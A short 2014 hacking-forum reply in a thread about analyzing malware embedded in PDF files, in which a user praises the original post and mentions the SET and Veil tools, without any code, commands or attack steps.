"Hacking is at least as much about ideas as about computers and technology. We use our skills to open doors that should never have been shut. We open these doors not only for our own benefit but for the benefit of others, too." - Brian the Hacker

Quote
15:04  @Phage : I'm bored of Python

Offline Architect

  • Sir
  • ***
  • Posts: 428
  • Cookies: 56
  • STFU
    • View Profile
    • Rootd IRC
Re: Analyzing Malacious Malware Embedded in Adobe PDF Files
« Reply #12 on: April 20, 2014, 03:57:44 am »
This post was actually really helpful, I tested this on some SET obfuscated files and it works. I also have to recommend the "Veil Framework" tool for exploitation. 9/10 great post.